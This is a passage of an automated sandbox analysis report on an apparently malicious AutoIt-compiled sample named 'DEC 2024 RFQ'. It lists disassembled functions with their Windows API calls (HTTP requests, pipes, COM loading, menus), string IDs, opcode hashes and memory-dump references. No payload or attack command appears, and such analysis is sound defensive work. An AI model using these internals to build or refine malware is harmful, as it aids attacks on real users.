                                                                                                                      • API String ID: 839392675-0
                                                                                                                      • Opcode ID: ac5f52cd29119e5f1f42dc6cf7b965761aec7786c612585cf8a05fa085f5cf44
                                                                                                                      • Instruction ID: 1dd2f14ca61d0db24dd2675e59e28a8a3126db21292add94a295dfe8e2e76933
                                                                                                                      • Opcode Fuzzy Hash: ac5f52cd29119e5f1f42dc6cf7b965761aec7786c612585cf8a05fa085f5cf44
                                                                                                                      • Instruction Fuzzy Hash: BCF01D32241959BBE7215BE2DC0DEBB7A7CEBC7B15F000169FA04D105196A91A0186B5
                                                                                                                      Function 00087230 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InterlockedExchange.KERNEL32(?,?), ref: 00087243
                                                                                                                      • EnterCriticalSection.KERNEL32(?,?,00030EE4,?,?), ref: 00087254
                                                                                                                      • TerminateThread.KERNEL32(00000000,000001F6,?,00030EE4,?,?), ref: 00087261
                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000003E8,?,00030EE4,?,?), ref: 0008726E
                                                                                                                        • Part of subcall function 00086C35: CloseHandle.KERNEL32(00000000,?,0008727B,?,00030EE4,?,?), ref: 00086C3F
                                                                                                                      • InterlockedExchange.KERNEL32(?,000001F6), ref: 00087281
                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,00030EE4,?,?), ref: 00087288
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3495660284-0
                                                                                                                      • Opcode ID: 3361136b0b8984b37d718b4eb995742bc6095102d80ce8c96a60db01973490a0
                                                                                                                      • Instruction ID: 4145441ffa3eb3126cb7a178af19dbae3ae851949107653fc58be2e51cf8cefa
                                                                                                                      • Opcode Fuzzy Hash: 3361136b0b8984b37d718b4eb995742bc6095102d80ce8c96a60db01973490a0
                                                                                                                      • Instruction Fuzzy Hash: 23F05E36540A13EBE7A22BA4ED4CAFA7769FF46702B100531F543910A4DB7A5801CB50
                                                                                                                      Function 00078992 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF), ref: 0007899D
                                                                                                                      • UnloadUserProfile.USERENV(?,?), ref: 000789A9
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000789B2
                                                                                                                      • CloseHandle.KERNEL32(?), ref: 000789BA
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 000789C3
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 000789CA
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 146765662-0
                                                                                                                      • Opcode ID: 7813bd57702af6500194af6e85f693904436c2f7b6635021c663f5c3917fab50
                                                                                                                      • Instruction ID: 9bce13c2dfee74042a0bc12fb3025c666e75b57f81c858b2de37678767bbda8f
                                                                                                                      • Opcode Fuzzy Hash: 7813bd57702af6500194af6e85f693904436c2f7b6635021c663f5c3917fab50
                                                                                                                      • Instruction Fuzzy Hash: 98E05276104906FFEB012FE5EC0C96ABB69FB8A762B508631F219C1470CB3A9461DB50
                                                                                                                      Function 000985ED Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • VariantInit.OLEAUT32(?), ref: 00098613
                                                                                                                      • CharUpperBuffW.USER32(?,?), ref: 00098722
                                                                                                                      • VariantClear.OLEAUT32(?), ref: 0009889A
                                                                                                                        • Part of subcall function 00087562: VariantInit.OLEAUT32(00000000), ref: 000875A2
                                                                                                                        • Part of subcall function 00087562: VariantCopy.OLEAUT32(00000000,?), ref: 000875AB
                                                                                                                        • Part of subcall function 00087562: VariantClear.OLEAUT32(00000000), ref: 000875B7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Variant$ClearInit$BuffCharCopyUpper
                                                                                                                      • String ID: AUTOIT.ERROR$Incorrect Parameter format
                                                                                                                      • API String ID: 4237274167-1221869570
                                                                                                                      • Opcode ID: 25b55cc989b5ec1df98b43ee2c8c3ce0e79dc7efd42c19935f3fb2f6054eee32
                                                                                                                      • Instruction ID: ef23781741528de16e141877cc6e0f1c2e1931381ae839dda698e383e3f83b03
                                                                                                                      • Opcode Fuzzy Hash: 25b55cc989b5ec1df98b43ee2c8c3ce0e79dc7efd42c19935f3fb2f6054eee32
                                                                                                                      • Instruction Fuzzy Hash: CA917F716083019FCB10DF64C48499BB7E4EF8A714F14896EF89A9B362DB31E945CB52
                                                                                                                      Function 00082A96 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0003FC86: _wcscpy.LIBCMT ref: 0003FCA9
                                                                                                                      • _memset.LIBCMT ref: 00082B87
                                                                                                                      • GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00082BB6
                                                                                                                      • SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00082C69
                                                                                                                      • SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00082C97
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ItemMenu$Info$Default_memset_wcscpy
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 4152858687-4108050209
                                                                                                                      • Opcode ID: 74ee54b63bf3eeb3b2cac87a6b7ec476c77436897743e4a43b000e0f2c046d25
                                                                                                                      • Instruction ID: eceaa1e9cfe1aabd7da663c9abd3af4cba8297ab0705beea9580f435e3e953aa
                                                                                                                      • Opcode Fuzzy Hash: 74ee54b63bf3eeb3b2cac87a6b7ec476c77436897743e4a43b000e0f2c046d25
                                                                                                                      • Instruction Fuzzy Hash: 0951CBB16093019ED7A5EE28D845ABFB7E8FF89310F040A2DF8D5E6291DB74CC048792
                                                                                                                      Function 0007D56C Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0007D5D4
                                                                                                                      • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0007D60A
                                                                                                                      • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0007D61B
                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0007D69D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                      • String ID: DllGetClassObject
                                                                                                                      • API String ID: 753597075-1075368562
                                                                                                                      • Opcode ID: e19c3dd14c439424925803bbf66ce1ee3808f11ea12d19cb61dada19116165cb
                                                                                                                      • Instruction ID: abe641ad3fc41349b9ca6dc1aa06c1cf56917acc27122612f3f66288ffc6f4cd
                                                                                                                      • Opcode Fuzzy Hash: e19c3dd14c439424925803bbf66ce1ee3808f11ea12d19cb61dada19116165cb
                                                                                                                      • Instruction Fuzzy Hash: 84418FB1A00205EFDB15DF54C884A9A7BB9EF44310F15C1AEED0D9F206D7B9D940CBA4
                                                                                                                      Function 00082753 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 000827C0
                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 000827DC
                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00082822
                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,000E5890,00000000), ref: 0008286B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      • API String ID: 1173514356-4108050209
                                                                                                                      • Opcode ID: acb8fdddb7055a547abc8d827245e93334d52d85eafc87d57912764f2a3c537c
                                                                                                                      • Instruction ID: 4e69830131555922016aed6c55939c41063725c6b40133b75fba501094221655
                                                                                                                      • Opcode Fuzzy Hash: acb8fdddb7055a547abc8d827245e93334d52d85eafc87d57912764f2a3c537c
                                                                                                                      • Instruction Fuzzy Hash: C9418E70605341EFDB24EF24C844B6ABBE8FF85324F14492EF9A597292DB30A905CB52
                                                                                                                      Function 0009D7A5 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0009D7C5
                                                                                                                        • Part of subcall function 0002784B: _memmove.LIBCMT ref: 00027899
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: BuffCharLower_memmove
                                                                                                                      • String ID: cdecl$none$stdcall$winapi
                                                                                                                      • API String ID: 3425801089-567219261
                                                                                                                      • Opcode ID: 1388fa4558b26ad392a376b0076e5fd5d9a29935f92fe8cd8af9c7c8b7858f55
                                                                                                                      • Instruction ID: e9080cf8766f9a68af6fbc5db21b850cf21024e6383d9823cc56abdc86109fe0
                                                                                                                      • Opcode Fuzzy Hash: 1388fa4558b26ad392a376b0076e5fd5d9a29935f92fe8cd8af9c7c8b7858f55
                                                                                                                      • Instruction Fuzzy Hash: D3318D7194461AABCF00EF54CC519FEB3B5FF05320B10862AE869A77D2DB71A905CB90
                                                                                                                      Function 00078E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 94windowCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00027DE1: _memmove.LIBCMT ref: 00027E22
                                                                                                                        • Part of subcall function 0007AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0007AABC
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00078F14
                                                                                                                      • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00078F27
                                                                                                                      • SendMessageW.USER32(?,00000189,?,00000000), ref: 00078F57
                                                                                                                        • Part of subcall function 00027BCC: _memmove.LIBCMT ref: 00027C06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_memmove$ClassName
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      • API String ID: 365058703-1403004172
                                                                                                                      • Opcode ID: 48b697fe9810eb47aa63b26792c1c37e5332fd0c4fbc003a6314ac03f21178b6
                                                                                                                      • Instruction ID: de1b749e2c1bc05896cf10206044f748d25ddb99c32881edbd1a11ea4f3f90c2
                                                                                                                      • Opcode Fuzzy Hash: 48b697fe9810eb47aa63b26792c1c37e5332fd0c4fbc003a6314ac03f21178b6
                                                                                                                      • Instruction Fuzzy Hash: 3621F271E40104BEDB14ABB09C49DFFB7A9DF06360B04C12AF429A72E2DF3958099764
                                                                                                                      Function 0009182D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 86networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0009184C
                                                                                                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00091872
                                                                                                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 000918A2
                                                                                                                      • InternetCloseHandle.WININET(00000000), ref: 000918E9
                                                                                                                        • Part of subcall function 00092483: GetLastError.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 00092498
                                                                                                                        • Part of subcall function 00092483: SetEvent.KERNEL32(?,?,00091817,00000000,00000000,00000001), ref: 000924AD
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3113390036-3916222277
                                                                                                                      • Opcode ID: d5c42c6395359531146e71c8d921b510e9a5572ef103ec01a062e591f93308e6
                                                                                                                      • Instruction ID: cd14aa7b770580a96af921f05f365dc61300501c3ea1424b929fa24c636e1da7
                                                                                                                      • Opcode Fuzzy Hash: d5c42c6395359531146e71c8d921b510e9a5572ef103ec01a062e591f93308e6
                                                                                                                      • Instruction Fuzzy Hash: 4321BEB5604209BFEB119BA0DC85EFF77EDEB49744F10412AF805A6280EA648D04B7A0
                                                                                                                      Function 000A63E7 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00021D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00021D73
                                                                                                                        • Part of subcall function 00021D35: GetStockObject.GDI32(00000011), ref: 00021D87
                                                                                                                        • Part of subcall function 00021D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00021D91
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 000A6461
                                                                                                                      • LoadLibraryW.KERNEL32(?), ref: 000A6468
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,00000000), ref: 000A647D
                                                                                                                      • DestroyWindow.USER32(?), ref: 000A6485
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      • API String ID: 4146253029-1011021900
                                                                                                                      • Opcode ID: d5675b93e7bb76b3632ee04013b2b361c11783e9cf7da1161a7580f3cf4c752d
                                                                                                                      • Instruction ID: e6cbdaabdafee42433e133b0c84981ed3623d846c7226e3fd21a0fa24f82143a
                                                                                                                      • Opcode Fuzzy Hash: d5675b93e7bb76b3632ee04013b2b361c11783e9cf7da1161a7580f3cf4c752d
                                                                                                                      • Instruction Fuzzy Hash: 4D21BB72200205ABEF104FE4DC80EBB37FDEB5A368F184629FA1097090C7369C41A760
                                                                                                                      Function 00086D9C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00086DBC
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00086DEF
                                                                                                                      • GetStdHandle.KERNEL32(0000000C), ref: 00086E01
                                                                                                                      • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00086E3B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 52cca21dfbc3693f8d0478200ac716de3ebe4f6cb66d878245d84d2168d8de59
                                                                                                                      • Instruction ID: f4f986f047031842eae4ada80e51dc534fd6bf5f669f680bb8db2d11a2c5d3f5
                                                                                                                      • Opcode Fuzzy Hash: 52cca21dfbc3693f8d0478200ac716de3ebe4f6cb66d878245d84d2168d8de59
                                                                                                                      • Instruction Fuzzy Hash: 73218174A0030AABDB20AF69DC04BAA77E8FF45720F214619FDE1D72D0DB729950CB50
                                                                                                                      Function 00086E6A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00086E89
                                                                                                                      • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00086EBB
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 00086ECC
                                                                                                                      • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 00086F06
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateHandle$FilePipe
                                                                                                                      • String ID: nul
                                                                                                                      • API String ID: 4209266947-2873401336
                                                                                                                      • Opcode ID: 50c673020e21fc721b0b2606e8861ffa6a8716f67bbc7b0ad68c1b70a9a63d53
                                                                                                                      • Instruction ID: c933aa16e5a2f6fd09176b2de9f9fd9946c7cbb6783df91fe4b959a74c4781fe
                                                                                                                      • Opcode Fuzzy Hash: 50c673020e21fc721b0b2606e8861ffa6a8716f67bbc7b0ad68c1b70a9a63d53
                                                                                                                      • Instruction Fuzzy Hash: 2C2183796003069BDB30AF69DC04AAA77E8FF55720F214A19FDE1D72D0DB72A851CB60
                                                                                                                      Function 0008AC40 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 0008AC54
                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0008ACA8
                                                                                                                      • __swprintf.LIBCMT ref: 0008ACC1
                                                                                                                      • SetErrorMode.KERNEL32(00000000,00000001,00000000,000AF910), ref: 0008ACFF
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1688598456.0000000000021000.00000020.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1688581931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000AF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1688904064.00000000000D4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690400005.00000000000DE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1690460626.00000000000E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_20000_DEC 2024 RFQ.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                      • String ID: %lu
                                                                                                                      • API String ID: 3164766367-685833217
                                                                                                                      • Opcode ID: 7559134ff3227ba441995f26486f91890e421db3e073d2f80aa7c78e07d98d96
                                                                                                                      • Instruction ID: 0f477f0658c4b79bcc1ecd7054ae0582f97f4e10ffb74282d0f0dbc669a5f088
                                                                                                                      • Opcode Fuzzy Hash: 7559134ff3227ba441995f26486f91890e421db3e073d2f80aa7c78e07d98d96
                                                                                                                      • Instruction Fuzzy Hash: 8E214171A00209AFDB10EFA5D945EEE7BB8FF49714B004069F9099B252DB71EA41CB61
